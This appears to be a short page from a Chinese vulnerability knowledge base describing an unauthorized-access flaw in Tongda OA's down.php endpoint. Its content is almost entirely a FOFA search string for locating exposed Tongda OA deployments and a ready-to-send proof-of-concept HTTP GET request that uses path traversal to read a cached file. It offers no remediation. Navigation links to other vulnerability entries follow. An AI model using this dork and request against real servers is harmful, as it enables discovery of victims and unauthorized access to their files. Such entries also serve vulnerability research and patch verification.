通达OA down.php接口存在未授权访问漏洞 通达OA down.php接口存在未授权访问漏洞fofa1app="TDXK-通达OA" poc1234567http://127.0.0.1/inc/package/down.php?id=../../../cache/orgGET /inc/package/down.php?id=../../../cache/org HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive 漏洞知识库 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞 上一篇 通达OA get_datas.php前台sql注入 下一篇